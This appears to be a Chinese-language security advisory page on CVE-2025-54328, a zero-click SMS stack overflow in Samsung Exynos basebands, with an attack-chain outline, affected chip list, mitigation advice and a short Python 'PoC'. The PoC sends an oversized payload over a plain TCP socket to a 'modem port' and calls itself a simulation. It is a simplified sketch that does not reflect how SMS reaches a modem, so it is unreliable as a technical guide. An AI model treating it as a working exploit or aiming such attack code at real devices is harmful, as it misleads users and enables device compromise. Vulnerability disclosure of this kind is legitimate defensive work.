CVE-2025-54328 CVSS 10.0 严重

CVE-2025-54328 三星Exynos处理器SMS缓冲区溢出漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-54328

漏洞类型

栈溢出

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Samsung Mobile Processor, Wearable Processor, Modem Exynos

漏洞概述

三星Exynos系列处理器（包括移动、可穿戴及调制解调器）在处理SMS消息时存在严重漏洞。攻击者无需用户交互即可通过网络发送特制的SMS RP-DATA消息，触发基于栈的缓冲区溢出。该漏洞可能导致远程代码执行，完全控制设备，对机密性、完整性和可用性造成极高影响。

技术细节

该漏洞位于Samsung Exynos基带固件的SMS解析模块中。在解析RP-DATA消息时，程序未能正确校验输入数据的长度，导致将超长数据复制到栈上的固定缓冲区中。由于未进行边界检查，攻击者可通过精心构造的数据包覆盖返回地址或关键函数指针，从而在调制解调器上下文中执行任意代码。CVSS 3.1评分为10.0，表明利用难度低且影响范围广（S:C），可能波及整个操作系统。

攻击链分析

STEP 1

侦察与准备

攻击者确认目标设备使用受影响的Samsung Exynos处理器型号，并准备特制的SMS RP-DATA数据包。

STEP 2

投递攻击载荷

攻击者通过网络向目标设备的电话号码发送恶意构造的SMS消息，无需用户点击或交互。

STEP 3

触发漏洞

目标设备的基带处理器在解析该SMS消息时，因栈溢出导致内存破坏。

STEP 4

执行代码与控制

攻击者利用溢出控制执行流，在设备上执行任意代码，获取系统最高权限或导致设备拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept: Fuzzing SMS RP-DATA to trigger stack overflow
# This is a simulation script demonstrating the payload structure.

import socket

def trigger_overflow(target_ip, modem_port):
    # 1. Construct malicious RP-DATA message
    # The payload size exceeds the buffer limit defined in the firmware.
    buffer_size = 1024
    overflow_payload = b'A' * (buffer_size + 500)  # Overflowing 500 bytes
    
    # 2. Encapsulate in protocol specific headers (Simplified)
    # RP-DATA Message Type + Length + Payload
    sms_packet = b'\x01' + len(overflow_payload).to_bytes(2, 'big') + overflow_payload
    
    # 3. Send to target modem interface
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, modem_port))
        s.send(sms_packet)
        print("[+] Malicious SMS packet sent.")
        s.close()
    except Exception as e:
        print(f"[-] Connection error: {e}")

# Disclaimer: For educational and defensive testing purposes only.

影响范围

Exynos 980

Exynos 990

Exynos 850

Exynos 1080

Exynos 2100

Exynos 1280

Exynos 2200

Exynos 1330

Exynos 1380

Exynos 1480

Exynos 2400

Exynos 1580

Exynos 2500

Exynos 9110

Exynos W920

Exynos W930

Exynos W1000

Modem 5123

Modem 5300

Modem 5400

防御指南

临时缓解措施

由于该漏洞利用无需用户交互且通过网络传播，风险极高。最有效的缓解措施是尽快应用厂商提供的固件更新。在补丁未发布前，用户应保持警惕，尽量开启运营商提供的网络层过滤服务（如有），并避免在公共网络中暴露敏感信息。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表